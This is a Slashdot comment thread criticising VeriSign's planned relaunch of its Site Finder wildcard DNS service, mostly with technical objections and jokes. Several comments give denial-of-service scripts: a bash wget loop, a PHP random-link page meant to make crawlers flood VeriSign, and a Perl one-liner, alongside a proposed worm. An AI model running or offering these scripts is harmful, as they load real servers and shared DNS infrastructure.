Guess which site is the next potential target for the MyDoom virus??

Re:Take a wild guess?!

[MrLizardo]

sco sidestepped the worm by making sco.com not resolve. When/if sitefinder comes back up it will _automatically_ be the next target for MyDoom. Cool, huh?

-Chan Secodina

I have a new job

God will roast ICANN stomachs in hell at the hands of Verisign.

I can say, and I am responsible for what I am saying, that they have started to commit suicide behind our firewalls. We will welcome them with bullets and shoes.

Re:And microsoft does this anyway to all windows u

[arcanumas]

I believe that Microsoft's use of redirection on bad domains would also fail by Verisign's actions.
I am sure, Microsoft wouldn't like that :)

Imagine a dispute between MS and Verisign. Kind of Dr. Evil Versus Minime.

VeriSign Poll

"Site Finder was not controversial with users, 84 percent of whom said they liked it as a helpful navigation service,.."

Hmm, I wonder how they selected those users ?

Something like this ?

Are you running Windows, Mydoom, Kazaa, and you don't care about privacy or legal issues ? Have we got a poll for you !

Re:VeriSign Poll

[beuges]

I know you were trolling, but anyways...

Actually, it makes sense to me that 84% of _users_ would not find it controversial, because typically, users wouldn't know or care about the implications that this will have behind the scenes. Now if Verisign was to quote the percentage of developers, administrators, and people who actually know what a bad thing this is, you'd have a more realistic figure.

Re:VeriSign Poll

[sn2k]

I would not be surprised if 84% of users said that it was not controversial and evil. But 84% said it was HELPFUL. I am very doubtful that that high of a percentage of users even knew of the existance of site finder.

Re:And microsoft does this anyway to all windows u

Dude I'm not too sure how accurate this is, since I haven't used IE in a long time, but there is a setting called "Search from address bar" in the IE preferences. You can turn it off. You can't turn off Verisign's.

Re:capitalism at its best...

If I were a shareholder, I wouldn't ask them to do this at all. Sure, it may boost short-term profits for them, but in the long-term, it could cause consumer rebellion against them and the revenue lost would probably far outweigh the short-term benefit. You can just look at the slashdot community and say that it could be potentially disastrous in the long-run. Sure, this community is a small subsection of the population, but these people are the gatekeepers for many aspects of the technological world and if you piss the gatekeepers off, all hell breaks loose.

when is DDOS not a DDOS ?

[mr_walrus]

can someone be blamed for doing a denial of service
to a site that Does Not Exist ?

how about some scripts to pump out requests to a fairly
limited set of known to be Non-Existent domains...

could this possibly cause an interesting burden on Verishit's servers?

would the name lookups themselves affect DNS too badly to
cause innocent collateral damage? i'd hope caching of a limited
set of non-existent names would avoid much dns load.

just curious, academic musing and all that...

Re:when is DDOS not a DDOS ?

[Dogers]

check out here
http://yro.slashdot.org/comments.pl?sid=9622 7&thre shold=1&commentsort=0&tid=95&mode=thread&pid=82358 95#8235916

if you havent seen it already :o

Re:when is DDOS not a DDOS ?

[CvD]

Disclaimer: I did not write this code myself. A fellow slashdotter did, but I can't find the comment any more (its in an old Verisign Slashdot story, if I remember right):

while [ true ]; do
wget -r www.`dd if=/dev/random bs=8 count=1 2> /dev/null | hexdump -e '"%1o"'`.com;
done

Have fun, if Verisign switches on their "service" again.

Re:when is DDOS not a DDOS ?

"Sitefinder is very popular with users, we have had almost one billion hits in the first 24 hours".

Re:when is DDOS not a DDOS ?

[pclminion]

[ I wrote this script for my web site back when Verisign first tried this shit. Slashdot has screwed up the formatting somewhat. You need PHP to be installed on your web server, obviously. Please don't criticize my HTML, the purpose of this is not to demonstrate high-quality HTML. ]

<html>
<head>
<title>Verisign slammer</title>
</head>

<body>
Th is page is computer-generated. It is not intended for any purpose you could
possibly be interested in. The purpose of this page is to cause Google and other search engines to DDoS Verisign as they crawl the web for links. Click on the links if you want, they will all
take you to Verisign's stupid "Wildcard" site. If you have any questions
direct them to <a href="mailto:abuse@verisign.com">abuse@verisign.co m</a>.<p>

<?php

for($i = 0; $i < 50; $i++)
{
for($j = 0; $j < 4; $j++)
{
$host = "";
for($k = 0; $k < 16; $k++)
{
$host .= chr(rand() % 26 + 97);
}
$host = "http://www.$host.net";
echo "<a href=\"$host\">$host</a>\n";
}
echo "<br>";
}

?>

</body>
</html>

It very well might be.

[demonic-halo]

Remember the times when microsoft and SCO had to change their web address to side step being attacked by DDOS for various worms?

If site finder goes up.. All falied DDOS going to old domain names will end up taking those attacks. Guess verisign will be the official decoy for outdated worms. =)

Re:It very well might be.

[irc.goatse.cx+troll]

I had a similar idea... I'd like to see a worm just start hitting random domains, just a GET request to http://akljfhaksjdfhaskldh.net, maybe 2 every 10 seconds or other such interval. Not only would you hammer sitefinder, you'd fill isp caches causing them to take notice and block the sitefinder trash. ..not that I'm conding anything like this..

Re:It very well might be.

[gnu-generation-one]

"All falied DDOS going to old domain names will end up taking those attacks."

Does that mean that when people remove the DNS entries for their website in anticipation of an attack (as SCO so recently did, and microsoft did with the windowsupdate.com domain), siteFinder will left responding to queries from an infinite number of virus-laden PCs?

Will their sponsors still pay to show advertising to these virus?

Re:It very well might be.

If someone does write such a worm, let's hope they build in an exit condition to handle the SiteFinder "service" being cancelled, or the user's ISP blocking it. Something like, as soon as one of the random DNS lookups returns NXDOMAIN, don't do any more for 7 days.

Not that I condone such an entertaining idea, of course!

Re:It very well might be.

Depends whether the viruses only request the page itself, or whether they also try to fetch the images on it.

Re:It very well might be.

This is a worm operating on the honor system:
perl -e 'while (1) { foreach ( 1.. 20) { $r[$_] = join ('',('a'..'z')[rand 26]); } `wget http://$r.com`; sleep 5; }'

Contact Verisign.

[MooKore+2004]

All slashdotters, espeically people that were seriously affected by sitefinder, please complain NOW. Let them know how controversial it is!

Re:Contact Verisign.

[Maestro4k]

• All slashdotters, espeically people that were seriously affected by sitefinder, please complain NOW. Let them know how controversial it is!

I certainly will, as well as many others, but the underlying problems is that Verisign doesn't care what we have to say, how we feel about sitefinder, or how it'll cause problems. They have repeatedly denied that sitefinder caused problems (even in the face of proof). Even if every person on /. complained, Verisign would probably still insist that everyone just loved sitefinder.

Re:Contact Verisign.

[pclminion]

Let them know how controversial it is!

Controversy implies the existence of opposing viewpoints. This isn't controversial at all -- we all know this idea is fucked.

Re:Contact Verisign.

[TekPolitik]

All slashdotters, espeically people that were seriously affected by sitefinder, please complain NOW. Let them know how controversial it is!

You have obviously mistaken VeriSign executives for people who give a shit.

Troubleshooting

[justinmc]

I don't know about you guys, but this made troubleshooting a pain for me. Me: you are not able to access the server? User: But I can ping it??? Me:Is it giving back (Sitefinder IP - can't remember it) User: Yes - it is responding, why can't I access it???? Me: Well you see, DNS works by... User: I don't care, fix it Me: But........

An apology from the Washington Post

[alien_blueprint]

Galvin said that the continued opposition stems from "an ideological belief by a narrow section of the technological community who don't believe you should innovate the core infrastructure of the Internet."

In our recent article a number of mistakes slipped past our content review processes. In this case "destroy" was incorrectly spelled "innovate". Also "ideological" clearly was meant be "correct". Likewise "narrow section" appeared instead of "all".

We apologise for these errors and any confusion they might have caused.

Re:An apology from the Washington Post

[bonkedproducer]

Galvin said that the continued opposition stems from "an ideological belief by a narrow section of the technological community who don't believe you should innovate the core infrastructure of the Internet.

SELLING CLICK-THRU ADVERTISING IS NOT MY DEFINITION OF INNOVATION!!!!

No, rather it the domain (no pun intented) of hacks like netster, and dotster, and geocities link farmers.

Developing applications that run through the end-users web browser are innovations. Making the web a useful tool for more than virtual billboards is innovation. These are the things that are damaged by Verisign's quick money grab. I say that ICAAN find another company to run the .com and .net TLDs - one that is non-profit. Since verisign bought Net. Sol. it's been downhill all the way everyday.

Re:And microsoft does this anyway to all windows u

[heikkile]

Yes, but that is only when you browse the web. When you mistype the address into anything else than a web browser (email address, ssh connection, ftp, vpn, ntp, Z39.50, any private protocol), the program is supposed to receive an error message, and handle it in some meaningful way. Instead the broken DNS gives you a sitefinder address, and your program tries to contact that. Most likely it will time out (in a few seconds), and report to the user that the server he wanted to contact is down. This causes lots of frustration among users, and lots of unnecessary support calls.

Re:And microsoft does this anyway to all windows u

[infront314]

You can change the url to anything you like.

Just do a about:config and change the keyword.URL setting.

I set mine to http://www.google.com/search?btnG=Google+Search&q= which is a regular Google search.

Re:You're just dumb

[freerecords]

*sighs* .. It's that I do not enjoy getting caught by a sysadmin (who is probably reading this as I write). Firebird is not the latest release anymore.. Firefox..

Re:And microsoft does this anyway to all windows u

[FrenZon]

When you type in a wrong address at the moment which doesn't exist, you are automatically taken to either a site search engine, which is pure crap.. or to the microsoft auto search [...]

Or you can just use the Microsoft created and provided TweakUI to change this to go whatever page or search engine you desire. The key is it's user-controlled (heck they can just use another browser), not a change to the core system as this Verisign shenanegans is.

Re:And microsoft does this anyway to all windows u

[alien_blueprint]

And firebird^H^H^H^Hfox does it for google ...

Are you sure?

I just tried a domain name that doesn't exist, and instead of being taken to Google or any other place, I saw a "www.randomdomainname.org not found" dialog box instead. It doesn't even give me an option to feed it to a search engine from there.

IIRC, IE will take you immediately to a search engine without displaying any error message. This is the annoying and broken behaviour that the OP was talking about.

Perhaps you've installed a plug-in or extension that is doing this?

Also, M$'s way sends you back to a Microsoft page - which is expected

No, it isn't. I expect it to say "domain name not found". End of story.

An extension of this idea

[ColourlessGreenIdeas]

Last time they were accepting emails to non-existant domains too. If everyone makes sure they have lots of web pages with long lists of email addresses in nonexistant domains then the spammers will spend a significant fraction of their bandwidth DOSing verisign instead of hassling the rest of us.

In your idea, remember to get the script to follow all the paid-for links. The advertisers will have to pay for the hit, and will soon realise they're getting bad value for money. And you can still identiy site-finder DNS entries easily, so you could just mis-spell random real web sites and see if they point to site-finder.

Re:An extension of this idea

[CvD]

This already exists... there's a simple CGI script for poisoning spam lists. It just generates endless links with email addresses on them, which the email address spiders just all (assumingly) blindly copy:

Sugarplum -- spam poison

sample...

If more people would use this, perhaps the spammers AND verisign will be discouraged. Two bastards with one stone. :-)

That is pure evil.

[demonic-halo]

I love the idea.

That would just put so much stress on BIND servers around the world. It can just very well bring down the internet for most of the world. That could easily cause a massive slow down in just looking up domain names since the caches can fill entire databases.

Re:That is pure evil.

[twistedcubic]

Indeed, it's evil, but if Verisign makes it trivial to DoS the entire internet, then SiteFinder is probably not a good idea.

Re:That is pure evil.

[sik0fewl]

I wouldn't mind going a few days without Internet if it means getting every BIND server admin to set delegation-only for net and com, effectively disabling ShiteFinder.

Re:And microsoft does this anyway to all windows u

[Dark+Lord+Seth]

It's not as if you can choose to not use DNS

Actually, you can. But Slashdot would be awkward when called "66.35.250.150, news for nerds, stuff that matters" instead...

I have yet to RTFA...

[RyuuzakiTetsuya]

But the text in the headline made me almost yell, "BULLSHIT."

Re:And microsoft does this anyway to all windows u

Many sites cannot be reached by their IP address alone. Ever heard of shared hosting ("name based virtual hosting")?

Looks like like they already have

[blorg]

Looks like they already have - www.nonexistentdomain.com ;-)

Well...

[i_am_syco]

Am I the only one here who actually thought SiteFinder was good? I mean, quite a few times, if I was typing in a domain, like say Homestarrunner.com, and I misspelled it, I'd get a "no server found" error, have to go back into the URL and try and figure out where I screwed up. Not exactly a challenge, but still annoying. With SiteFinder, I just have to click the link that popped up. And it always popped up.

Re:Well...

While it may have it's minor uses, as your example listed above, the primary cause for the hatred of the system is that it literally *breaks* the system. By offering that tiny convienence it wants to destroy DNS and TCP rules. Most of us feel that sacrafice is uncalled for and unnessessary.

Re:Well...

[squiggleslash]

This is your web-browser's job, not the role of DNS.

DNS is used by a variety of applications, not just the web. By returning bogus data instead of "NXDOMAIN" (non-existant domain) to applications, applications are unable to easily detect legitimate errors.

Many/most web-browsers already allow you to configure them to go to a search engine in the event of a problem. People actually complain about IE doing it, and IE is the most installed/used webbrowser on the planet, so at most maybe 5% of people, who use browsers other than IE, whose browsers do not support searching for bad domains, would find this "hack" useful.

Additionally, a web browser knows basic information such as what language you speak. SiteFinder didn't. The impact of SiteFinder is such that it replaces an error message everyone can read with a page that many people cannot.

It's bad, and redundant, for web browsers. And it breaks everything else. What's the up-side?

Re:Well...

[gclef]

I have to think you're trolling, but I"ll bite anyway. You're falling into the common trap of only thinking of DNS as affecting Web traffic. What about email? If you fat-finger your friend's email address, don't you *want* that email to come back, rather than dissappearing into the void that is Verisign? The wildcard they're putting into the DNS isn't just about web traffic. It's *all* DNS queries...that's going to affect email, ssh, nntp, everything. Once of the basic spam filters, for instance, is a check to see if the sender's domain exists. With the wildcard, *all* domains exist, causing you to get more spam.

SiteFinder the search service is fine. The DNS wildcard to *force* you to SiteFinder is what makes people angry.

Re:Well...

[aug24]

If you read a large thread further up, you'll see that that functionality can only sensibly be implemented at the application (browser) level. To do it at the DNS level will break the DNS model. This means that any of the many other applications that use DNS will be broken as they can no longer distinguish between real and fake domains.

Trivial example: spam sender checks will now resolve for all attempts, thus preventing simple blocking of spoofed senders. Want more spam?

Justin.

Re:Well...

[PsychoSlashDot]

Am I the only one here who actually thought SiteFinder was good? I mean, quite a few times, if I was typing in a domain, like say Homestarrunner.com, and I misspelled it, I'd get a "no server found" error, have to go back into the URL and try and figure out where I screwed up. Not exactly a challenge, but still annoying. With SiteFinder, I just have to click the link that popped up. And it always popped up.

As I understand the functionality of SiteFinder, it tries to find resolution for false lookups. My problem with this is that in business, if a customer dials my phone number incorrectly, they'll get one of two things; either a "this number is not in service" message, or a RANDOM incorrect answer. With something like SiteFinder, it's the net equivalent of that same customer dialing incorrectly and getting either my actual number or... MY COMPETITORS' numbers. I want people to KNOW they've gone to the wrong place.

That's on top of all of the other things resolving lookups that aren't supposed to resolve breaks.

Re:Well...

[Pakaran2]

Yep. If a web browser chooses to search on non-existent domains, that's the choice of the application developer. And if you don't like it, you can download Opera/Mozilla/Konqueror/about a zillion others, many of them happening to be open source.

Or you can run a platform that doesn't even support IE. But there's no choice when it comes to the DNS.

Re:Well...

Essentially, you are admitting that you are a clueless idiot.

Re:Well...

I hadn't thought about SSH. What if you're trying to SSH to example.com and instead type in ssh exampl3.com? Could Verisign respond with a prompt that says "login" and then get your username and password, if they felt like it? It would be a relatively simple matter to guess what you were trying to reach - could they turn around and ssh into your account?

Re:Well...

[geoffspear]

I doubt anyone "complains" that IE redirects to a search page when it gets an NXDOMAIN, since it doesn't. People on slashdot who haven't tried actually typing an invalid domain name into IE complain about a feature that doesn't exist.

Re:Well...

[squiggleslash]

Well, I just tried it. It might have been removed as I use a rather old version of IE (5.something) on the box that's nearest me, but I was redirected to this:

http://search.msn.com/dnserror.aspx?FORM=DNSAS&q=w ww.sjsdfhjasdfjkfanjkasnjkfknjasfsnjkfasfa.com

Is IE6 not doing this? Or did you not check your options (you can turn it off you know ;-) before you tested it?

Re:Well...

[pclminion]

Could Verisign respond with a prompt that says "login" and then get your username and password, if they felt like it?

No. The username and password are authenticated by a cryptographic challenge. The password is never sent over the channel, in encrypted form or otherwise. It's a mathematical challenge protocol which only works if both sides already know what the correct password is.

It's impossible to set up a "fake" ssh server and steal people's passwords. This was one of the design points of ssh (and any other cryptographic service worth its salt).

Re:Well...

[i_am_syco]

All of those are excellent points that I hadn't considered. Of course, I know nothing about the infrastructure of the internet.

Surely this could be considered trademark dilution

Why aren't major companies/monopolies/evil people with lots of money speaking out about this? Are they getting a cut? Seems you need $$$ to make a 'controversy'.

Maybe what Verisign needs...

[Wiser87]

...is an "IntelligenceFinder" ?

Fine, if it's within your control

[blorg]

Getting a search engine is fine, if that's within my control. That's a good *browser* feature. And with a good browser, you can configure such a feature to go where you want it to, or just to give an error message (my personal preference). The problem with Verisign's approach is that there is nothing to tell the browser that there was no DNS record, so you no longer have the choice.

Re:Fine, if it's within your control

[twoshortplanks]

Agreed.

This is why I said "The complete wrongness of the way Verisign are going about it aside"

Re:Fine, if it's within your control

[TyrranzzX]

I often ask myself "what would be the most elegant solution to this problem?". To this, I believe the best elegant solution would be to simply blacklist verisign on your routers and add a static route translating their ip address to one that won't route, like 255.255.255.255 or 192.168.1.1. YOu can also use ACL's to accomplish the same, or firewalls.

As for error generation, if you've got DNS redirection on your router (like on my cisco I can tell it to take one DNS name and rediect it to another, or take on IP and redirect it to a DNS name), you can redirect the DNS name to a fictional one, like

"www.this.dns.name.doesn't.exist.net.com.org.bleg. ARGH"

For those of you who don't have pretty routers, use the windows hosts file to do the same with DNS and IP redirection on your boxen.

I'v got a feeling that if enough admins and ISP's blacklist their domain, they'll either get the message, or start trying to change IP's and whatnot. Inwhich case I believe ICANN will get real pissed at them dodging our blacklist for buisness.

Re:Fine, if it's within your control

[MCZapf]

It would be more elegant to fix it at your DNS server, assuming you run one. Most have patches available that effectively null out the bogus replies quite nicely.

Re:Fine, if it's within your control

[Lev_Arris]

This would actually be a bad 'solution' if you consider how SMTP mail sending operates. Currently, mails sent to an inexistent domain will bounce immediately at the bogus SMTP server they set up. If you were to route the traffic in a way that prevents access, your mail would get stuck in the queue and your server would keep retrying several times before giving up and notifying you of the failure.

Better solution is to patch your DNS server to return NXDOMAIN instead of sitefinder's IP(s) (the way it should be(TM) ).

Re:Fine, if it's within your control

[TyrranzzX]

I agree with both of you, patching is a much better solution. However, for those of us who don't have a patch, you've got to find a work-around.

AS for SMTP servers going bonkers, I don't see how that can happen if you blacklist the DNS entry at your end such that if it returns wrongly, it'll get klined.

Re:Mydoom.V

[lutefish]

Are you suggesting that Verisign are really alien lizards in disguise? That explains a lot. Including the yak-marketing.

it's not a lie if there is a grain of truth to it

[Tom]

"Site Finder was not controversial with users"

Hm, let's see:

a) Right. It just was extremely controversial with those who didn't use it (i.e. everyone else, like 99% of the Internet users)

b) Right, it wasn't controversial. Everyone agreed that it's a bloody fucking stupid thing.

c) Right, it wasn't the Sitefinder page itself that we all hated, it was Verisigns "bend over, here we come" attitude of forcing it on everyone, whether they wanted to or not.

Now that's three ways how he's saying the truth. Can't really argue with that, can you?

DNS only works well with single authoritative root

[blorg]

Nice idea, but the domain system only really works if we all agree on a single set of authoritative root servers. Otherwise you are effectively introducing another level into the DNS - go to 'www.mydomain.com2' is not very useful if you also have to append instructions on how to change your DNS servers. I can just imagine the voiceover at the end of the radio ads - very fast, and in the style of 'terms and conditions apply'.

auto.search.msn.com

[Pervertus]

I can't find it in TweakUI (w2k). Where is it exactly?

Re:auto.search.msn.com

[FrenZon]

My gosh. You're right, it's not there. I wonder how I did manage to get my IE to use google instead, then - I know the google toolbar can do it, but I don't have that installed.

Either way, I was terribly wrong, so please feel free to mod my original post off the face of the planet (my point remains, however).

Re:auto.search.msn.com

[Pervertus]

Oh I remember! When you install the google toolbar it asks you if you want to use Google as the default search engine. Maybe you installed it?

Re:And microsoft does this anyway to all windows u

[Lumpy]

you can, it's easily selectable from a list of search engines that are compatable.

microsoft chose not to allow you to do that.

Re:And microsoft does this anyway to all windows u

[TEB_78]

And as understand it some anti-spam programs does a lookup on the senders hostname to see if it's a valid hostname. If the lookup returns an error (not found) they send the mail directly to the trash.
But with this service you will always get a hit. Which in turn renders this anti-spam program ineffective.
Of course you could use other anti-spam tool, but this stops a lot of spam with fake hostnames.

Dear Verisign

[salesgeek]

On the sitefinder thing: NO THANK YOU.

We don't want it. It looks like one of those domain squater search engines where every link goes to gay oran utan porn. You all can keep it. I like my error messages better.

Pathfinder

I would be more impressed if Verisign restarted the Pathfinder instead of Sitefinder.

You must be new here

[blorg]

"Am I the only one here who actually thought SiteFinder was good?"

Yes.

Re:You must be new here

If you search on Google for "Verisign Sitefinder Good" you get about 8000 hits. Searching for "Verisign Sitefinder Bad" you get just over 1000.

I think we all know what that means.

Re:capitalism at its best...

[Lucky_Norseman]

Also, this community has lots of weight in the recommendation og technical solutions.

"Yes boss, we could use Verisign, but I spent some hours last night finding alternative solutions that are both better and cheaper. Here they are."

How many companies are looking to work with SCO these days?

Re:And microsoft does this anyway to all windows u

[Squidbait]

The terms "public trust" and "corporation" are incompatible. What were they thinking?

Re:not to feed the trolls but

sure, iraqi's don't count...wright...

Maybe you should join the forces...or is the couch to comfortable?

Isn't there anything we can do?

[lofoforabr]

Can't we do something, I mean, something to legally make them pay for it?
Verisign has a long story of abuse with DNS, and we should be able to do something more than bitch about it or make technical workarounds (ie, patches to dns) about it.
Perhaps a petition to ICANN with enough signatures to make them revoke Verisign's contract?

Re:Isn't there anything we can do?

Can you say "Class Action?"

Re:Isn't there anything we can do?

[platipusrc]

why doesn't everyone just start domain arbitration proceedings for all of the matched domains that are very similar to the ones they already have? Since Verisign will basically typo-squat all domains in existance, there should be quite a few domains that could be sued over.

Re:Isn't there anything we can do?

"Can't we do something, I mean, something to legally make them pay for it?"

You can file a lawsuit enumerating damages, once consequential damages have been done. Depending on the venue in which you file such a suit, you may be guaranteed a right to at least one hearing, and you may be guaranteed the right to have that hearing in the presence of a jury.

Re:Isn't there anything we can do?

[DrVomact]

No, there's nothing, absolutely nothing we can do. Obviously, the naifs at Verisign haven't realized how BAD we are at typing. I think it's very likely that their service will be DELUGED with requests for non-existent URLs...OVERWHELMED even, to the point where we may experience a DENIAL OF this uniquely useful SERVICE. Alas.

Re:not to feed the trolls but

sure, iraqi's don't count...right... Maybe you should join the forces...or is the couch too comfortable?

Sitefinder breach of contract with ICANN?

[blorg]

Verisign only operate .com and .net under contract from ICANN. Surely they can be prevented from relaunching Sitefinder under purely contractual grounds - previously ICANN was much against Sitefinder and threatened to sue, quoting breach of contract:

"The contractual inconsistencies include, violation of the Code of Conduct and equal access obligations agreed to by VeriSign, failure to comply with the obligation to act as a neutral registry service provider, failure to comply with the Registry-Registrar Protocol, failure to comply with domain registration limitations, and provision of an unauthorized Registry Service."

Re:And microsoft does this anyway to all windows u

[jimhill]

You do know that there's a lot more to the Net than the Web, right? And that having a website returned instead of the spec-ordered "No such domain" when you're using a different Net scheme (like email, or chat, or good ol' gopher) is fundamentally Wrong. If the Web were a distinct thing that had its own DNS then I doubt many would be grousing, save those whose profits just got diverted into VeriSlime's ShiteFinder pockets.

ObInsult: Ya Jughead!

Re:And microsoft does this anyway to all windows u

[twoshortplanks]

Sorry, what? I was posting about how getting a search page back in your webbrowser was a good thing. I fail to see what this has to do with anti-spam systems. Sure, verisign's technique will cause the problems I think you're trying to describe, but I wasn't talking about the technique used. Hence why I said "The complete wrongness of the way Verisign are going about it aside".

Re:And microsoft does this anyway to all windows u

[AllUsernamesAreGone]

... where we can't install a single thing

If you can save files somewhere (most schools give you space on a central fileserver) then you can install Fire.* - download to filespace, unpack, run program. No full-blown Windows Installer access required.

And you're looking at the issue from the wrong perspective. Most admins couldn't care less what home users see when they type in the wrong URL: a search engine is a good as anything and probably the right thing to do for most people. What they do object to is the fact that wildcard DNS resolution breaks a lot of things end users never see but admins have to deal with on a daily basis - the resolution failure should be handled by the browser, not at the DNS level where there are times when you want a name that doesn't exist to not resolve.

Re:not to feed the trolls but

10 February, 2004, 11:55 GMT

Car bomb kills many near Baghdad

Re:And microsoft does this anyway to all windows u

[tfb]

As others have pointed out, that's not the same thing at all: what Verisign want to do is to usurp the basic look-up-a-name service.

In fact, I'd expect Microsoft &co to *strongly* object to this, since what it will mean is that dns lookups will eseentially never fail, so you'll never see the search page from IE &c. Essentially Verisign are going to start providing the service that MS now does for IE users, and google now does for Mozilla!

Debate is all about the method

[blorg]

Heh. Well the debate is all about the way Verisign is going about it. No-one would care if Verisign released a 'Verisign Explorer' browser, with their Sitefinder feature built in. The problem is that they are abusing their monopoly position with .com and .net to shove this 'feature'^H^H^H^H^H^H^H^H^H bug - and it truly is that - down people's throats.

60 to 90 DAYS

[RAMMS+EIN]

60 to 90 days to patch every network utility out there to work around the DNS breakage. ROFL.

Oh, wait, that's NOT funny.

Re:60 to 90 DAYS

[Skater]

Heck, we might as well switch to IPv6 while we're at it! ;)

--RJ

Re:60 to 90 DAYS

[gnu-generation-one]

"60 to 90 days to patch every network utility out there to work around the DNS breakage. ROFL."

Who will pay for it? Verisign?

I see a physical DDoS of invoices arriving at Verisign HQ...

Re:Looks like like they already have - confiirmed

[SpaceLifeForm]

Stratton Sclavos, chief executive of VeriSign Inc., told investors in a conference call last month that the company might relaunch its "Site Finder" service as early as April.

Obviously, since VeriSign has just proven they are not competent enough to use a calendar, clearly they are not competent enough to run DNS.

Re:And microsoft does this anyway to all windows u

[Ice_Balrog]

"Firefox" will do an I'm Feeling Lucky search if you type in something it thinks isn't a URL. Type in, say, "slashdot" and Firefox will do an I'm Feeling Lucky search becuase it isn't a URL. Type in, www.dsfgsdfjghk.com and it will give an not found error because www.dsfgsdfjghk.com is a URL.

Re:And microsoft does this anyway to all windows u

[TEB_78]

The connection to anti-spam systems is there since it's done at DNS level. It messes up the way the internet works.
And you argued positivly for having this feature, so I thought I should mention the negative effect from it.
And on the point that we're not going to see anything else of use there...well I consider something like site not found a usefull response. Then I can set up something myself if I want to handle that response.

Re:And microsoft does this anyway to all windows u

You are wrong, Windows users using IE has less than 50% of the market for programs that use DNS, which is what verisign is trying to break.

Outlook and Outlook Express have almost as many users as IE. And there are loads of IRC programs, and not to forget, Quake, Unreal Tournament and all the other online games.

Microsoft doing this stuff in the browser affects only people using IE, and even they can turn it off. Verisign doing this stunt with DNS affects everyone, not just web servers.

Re:And microsoft does this anyway to all windows u

[GregWebb]

Thank you! I'd forgotten you had that screen and just found why keyword browsing had stopped working here!

I now have a happy browser again. Why they turned that off on the default config for Moz I don't know...

Re:And microsoft does this anyway to all windows u

[alien_blueprint]

Ah, I see. My text was clearly a URL. I guess this must mean I've never put anything else except a URL into the location field, as I've never noticed this before.

Anyway, I consider this behaviour being "on" by default to be a misfeature. I might raise it with the dev team. Still, as others have pointed out, it can be switched off or pointed somewhere else. Whereas, we're told, in MSIE can't be.

Alternative root servers

[RAMMS+EIN]

Would using alternative root servert also allow domains with just one part? E.g. slashdot instead of slashdot.org?

I find the TLDs a bit silly, since the general purpose ones lost much of their meaning (commercial websites have .org or .net TLDs), they are confusing (is the site for this norwegian company .no or .com?), most sites will want to have .com anyway, as it is sort of the de facto standard one, etc. So why don't we just dispose of the TLD, and the hostname, and call the website slashdot instead of slashdot.org?

Re:Alternative root servers

[0x0d0a]

Because then you would have massive numbers of name collisions between names like foo.net and foo and foo.bar, etc.

Futhermore, the administrative structure of DNS is also based on the hierarchy, and having a flat name system would cause all kinds of issues.

This would also prvent the introduction of new TLDs for fear of a name collision with the TLD itself.

*Finally*, why would we alias *.com to a TLD? Folks in, say, the UK, might prefer *.co.uk.

If you want "slashdot" to resolve to "slashdot.org", you can add it to your hosts file and get the effect without causing massive network problems.

Re:Alternative root servers

[Drakon]

because
Aich Tee Tee Pee Slash Slash Slash Dot Dot Org

Re:Alternative root servers

[RAMMS+EIN]

You give me excellent opportunities to clarify my idea. Thanks. :-)

Because then you would have massive numbers of name collisions between names like foo.net and foo and foo.bar, etc.

You wouldn't. There will be no more foo.net and foo.com, only foo. Of course, below your domain you could still make subdomains. So, today's com.com could register the domain com, and they would then be able to name their sites news.com or news.com.com, or long_urls_rule.com or we.like.dots.a.lot.com. The idea is that TLD disappear entirely, not that we fill in a default TLD when none is supplied.

Futhermore, the administrative structure of DNS is also based on the hierarchy, and having a flat name system would cause all kinds of issues.

Granted, DNS as we know it wouldn't be able to cope with it. There is no hierarchy based on TLD, SLD, ... anymore, because SLD is now at the top level. This means that there are far more top level domains than now (more than there are .com domains now). Name service should take a more distributed (as opposed to hierarchical) structure to cope with this. However, I don't think this is impossibe or even that hard to implement.

This would also prvent the introduction of new TLDs for fear of a name collision with the TLD itself.

*Finally*, why would we alias *.com to a TLD? Folks in, say, the UK, might prefer *.co.uk.

Once again, TLDs would no longer be. There wouldn't be a .com and .co.uk and .no anymore. Just the name of the site, one word.

If you want "slashdot" to resolve to "slashdot.org", you can add it to your hosts file and get the effect without causing massive network problems.

I do that for all sites I access a lot. However, that gives me ease of use, not all my friends and family who don't have a clue why some websites are foo.com and others are bar.nl.

Re:Alternative root servers

[fanpoe]

Tee Aich Ee Pee Ay Gee Ee Cee Ay En En Oh Tee Bee Ee Dee Eye Ess Pee Ell Ay Why Ee Dee.

Re:Alternative root servers

[adamjaskie]

So... who gets foo? Does it go to the owners of foo.com, foo.net, foo.org, or foo.info?

Re:Alternative root servers

[gid13]

"If you want "slashdot" to resolve to "slashdot.org", you can add it to your hosts file"

Or you can just use Firefox. No fuss, albeit a slight delay.

Re:Alternative root servers

[edbarrett]

Okay, TLDs are gone. Who gets "whitehouse" -- whitehouse.gov or whitehouse.com? Yeah, any reasonable person would say "that's an easy one" (answer is left as an exercise for the reader, but how about tldp? The Linux Documentation Project or Townsend Letter for Doctors and Patients?

Re:Alternative root servers

Did you have cancer? Because you're missing a colon.

Re:Alternative root servers

[RAMMS+EIN]

``So... who gets foo?''

Whoever applies first, or any other criterion for that matter. See it as a new service. We don't assign all current domain names to new domain names, we just offer the new domain names as a new service.

Re:Alternative root servers

[MurphyZero]

ok, so foo.net applies first and gets foo. Foo.com being slow then chooses... foocom, and foo.org choose fooorg.

And you decide that it worked so well for your new internet, that you decide to get rid of folders on your computer. All files belong at the top level. All the confusion of which folder is it in goes away. and who needed all those readme files anyways. one is good enough. /sarcasm off

The domains make sense because they organize the internet somewhat. Those people who don't understand the difference between whitehouse.com and whitehouse.gov need to step away from their computer and RTFM, a FAQ or two, take a class, before they proceed any further.

Re:Alternative root servers

[RAMMS+EIN]

To respond to your sarcasm:

``All files belong at the top level. All the confusion of which folder is it in goes away.''

I am actually in favor of this. Instead of organizing in directories, you would categorize files according to their type, the project they belong to, owner, and any number of other attributes (think BeOS, WinFS). To further the similiarity with the domain names: even extensions could vanish, as the file type is stored in the filesystem. I think that Reiser4 would be able to do this, efficiently.

``The domains make sense because they organize the internet somewhat.''

Domains: yes. TLDs: no. As I explained in my original post, the semantics of TLDs are often violated, so they cause confusion more than organization. Besides, even the organizational principles are ad-hoc; a university is both an educational institution and in a specific country. Does it's site have .edu, ., or both?

Re:Alternative root servers

[0x0d0a]

.edu, .gov, and .com (and probably .net, though I can't be sure) apply specifically to the United States. The US built the original system, so it originally started the hierarchy in the US.

To be sure, many companies not based in the US purchased .com addresses when Navigator and Communicator resolved keywords like foo to www.foo.com, and the difference between the TLDs started to slide.

I'm not saying that the TLDs are perfect, but I think that it would require very significant benefits to undergo the branding, marketing, administrative, and technical costs involved in such a major shift.

Tomatoes

[nuintari]

